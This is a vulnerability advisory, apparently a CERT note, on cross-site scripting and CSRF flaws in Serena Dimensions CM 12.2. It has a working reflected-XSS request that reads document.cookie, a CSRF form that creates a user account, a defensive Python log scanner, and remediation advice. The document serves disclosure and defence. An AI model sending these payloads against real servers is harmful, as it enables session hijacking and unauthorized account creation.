CVSS2 base score: 6.8 (Medium)

Metric | Value |
---|---|
Attack Vector | NETWORK |
Attack Complexity | MEDIUM |
Authentication | NONE |
Confidentiality Impact | PARTIAL |
Integrity Impact | PARTIAL |
Availability Impact | PARTIAL |
Vector | AV:N/AC:M/Au:N/C:P/I:P/A:P |

EPSS: 0.003 (Low), percentile 69.0%
Serena Dimensions CM 12.2 Build 7.199.0 web client and possibly earlier versions contains multiple cross-site scripting vulnerabilities.
CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') - CVE-2014-0335
#Unauthenticated vulnerable parameters
/dimensions/ [DB_CONN parameter]
/dimensions/ [DB_NAME parameter]
/dimensions/ [DM_HOST parameter]
/dimensions/ [MAN_DB_NAME parameter]

#Authenticated vulnerable parameters
/dimensions/ [framecmd parameter]
/dimensions/ [identifier parameter]
/dimensions/ [identifier parameter]
/dimensions/ [merant.adm.adapters.AdmDialogPropertyMgr parameter]
/dimensions/ [nav_frame parameter]
/dimensions/ [nav_jsp parameter]
/dimensions/ [target_frame parameter]
/dimensions/ [id parameter]
/dimensions/ [type parameter]
Proof-of-Concept:
GET /dimensions/?jsp=login&USER_ID=sa_dmsys&PASSWORD=D%21m3nsions&SYSTEM_DEFINITIONS=0&FORWARD_TARGET=jsp%25253dlogin&MAN_DB_NAME=2f<%2fscript><script>alert(document.cookie)<%2fscript>207&MAN_DB_CONN=&MAN_DM_HOST=&DM_HOST=TEST1&DB_NAME=TEST2&DB_CONN=TEST3&apiConnDetails=&MENU_SET=Default HTTP/1.1
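As an added example that is not part of this advisory or of the vendor's code: a Python scan over constructed web-server access-log lines that flags requests to /dimensions/ whose unauthenticated login parameters (DB_CONN, DB_NAME, DM_HOST, MAN_DB_NAME) carry HTML markup shaped like the proof-of-concept above, and shows the entity-encoded form a fixed page should reflect instead. The log lines, client addresses and regular expressions are assumptions made for the example.

```python
import html
import re
from urllib.parse import parse_qs, urlsplit

# Login-page parameters the advisory lists as injectable without authentication.
UNAUTH_PARAMS = {"DB_CONN", "DB_NAME", "DM_HOST", "MAN_DB_NAME"}
# Crude marker for HTML/script markup in a decoded value (opening or closing tag).
TAG_RE = re.compile(r"<\s*/?\s*[a-z]", re.IGNORECASE)
REQ_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/')

# Constructed sample access-log lines (not real traffic); the second request
# carries a payload shaped like the advisory's proof-of-concept.
SAMPLE_LOG = """\
10.0.0.5 - - [07/Mar/2014:10:00:01 +0000] "GET /dimensions/?jsp=login&DM_HOST=TEST1&DB_NAME=TEST2&DB_CONN=TEST3 HTTP/1.1" 200 512
10.0.0.9 - - [07/Mar/2014:10:00:02 +0000] "GET /dimensions/?jsp=login&MAN_DB_NAME=2f%3C%2fscript%3E%3Cscript%3Ealert(document.cookie)%3C%2fscript%3E207&DB_CONN= HTTP/1.1" 200 512
10.0.0.9 - - [07/Mar/2014:10:00:03 +0000] "GET /static/logo.png HTTP/1.1" 200 1024
"""

def suspicious_params(request_target: str) -> dict:
    """Return {param: decoded value} for unauthenticated /dimensions/ params holding markup."""
    parts = urlsplit(request_target)
    if not parts.path.startswith("/dimensions/"):
        return {}
    hits = {}
    # parse_qs percent-decodes once, turning %3C%2fscript%3E into </script>.
    for name, values in parse_qs(parts.query, keep_blank_values=True).items():
        if name in UNAUTH_PARAMS:
            for value in values:
                if TAG_RE.search(value):
                    hits[name] = value
    return hits

def scan_log(text: str) -> list:
    """Return (client_ip, param, value) tuples for every flagged request line."""
    findings = []
    for line in text.splitlines():
        match = REQ_RE.search(line)
        if match:
            for name, value in suspicious_params(match.group(1)).items():
                findings.append((line.split()[0], name, value))
    return findings

def safe_reflection(value: str) -> str:
    """How a fixed page should reflect the parameter: entity-encode it (CWE-79 mitigation)."""
    return html.escape(value, quote=True)

if __name__ == "__main__":
    for ip, name, value in scan_log(SAMPLE_LOG):
        print(f"{ip} injected markup via {name}: {value!r} -> {safe_reflection(value)!r}")
```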
CWE-352: Cross-Site Request Forgery (CSRF) - CVE-2014-0336
Proof-of-Concept:
```html
<html>
<body>
<form action="http://testhost:8080/adminconsole/?jsp=user_new_master&target=merant.adm.dimensions.objects.User&create=yes" method="POST">
<input type="hidden" name="-AdmAttrNames.user_dept" value="" />
<input type="hidden" name="-AdmAttrNames.id" value="HACKTEST1" />
<input type="hidden" name="USER_CURWORKSET" value="%24GENERIC%3a%24GLOBAL" />
<input type="hidden" name="isUserEdit" value="false" />
<input type="hidden" name="-AdmAttrNames.user_site" value="" />
<input type="hidden" name="-AdmAttrNames.user_phone" value="" />
<input type="hidden" name="AUTOMATIC_LOGIN" value="" />
<input type="hidden" name="-AdmAttrNames.user_group_id" value="" />
<input type="hidden" name="null" value="" />
<input type="hidden" name="DIALOG_MODE" value="MODE%5fCREATE" />
<input type="hidden" name="-AdmAttrNames.user_full_name" value="HACKTEST1" />
<input type="hidden" name="projectPicker" value="%24GENERIC%3a%24GLOBAL" />
<input type="hidden" name="wait_until_loaded" value="" />
<input type="hidden" name="projectPickerUid" value="1" />
<input type="hidden" name="GROUPS_ASSIGNED" value="" />
<input type="hidden" name="-AdmAttrNames.email" value="ken1%2ecijsouw%40sincerus%2enl" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
```
A remote unauthenticated attacker may be able to execute arbitrary script in the context of the end-user’s browser session.
Apply an update
The vendor has addressed these issues in version 14.1. Users are encouraged to update to the latest release.
Restrict access
As a general good security practice, only allow connections from trusted hosts and networks. Note that restricting access does not prevent XSS attacks since the attack comes as an HTTP request from a legitimate user’s host. Restricting access would prevent an attacker from accessing the interface using stolen credentials from a blocked network location.
Updated: September 17, 2015
Statement Date: September 17, 2015
Status: Affected
We have not received a statement from the vendor.
VU#823452 has been addressed by the Dimensions CM version 14.1 and later, which was released in June 2014.
Group | Score | Vector |
---|---|---|
Base | 6.8 | AV:N/AC:M/Au:N/C:P/I:P/A:P |
Temporal | 5.5 | E:POC/RL:U/RC:UC |
Environmental | 1.4 | CDP:ND/TD:L/CR:ND/IR:ND/AR:ND |
Thanks to Ken Cijsouw for reporting this vulnerability.
This document was written by Michael Orlando.
Field | Value |
---|---|
CVE IDs: | CVE-2014-0335, CVE-2014-0336 |
Date Public: | 2014-03-07 |
Date First Published: | |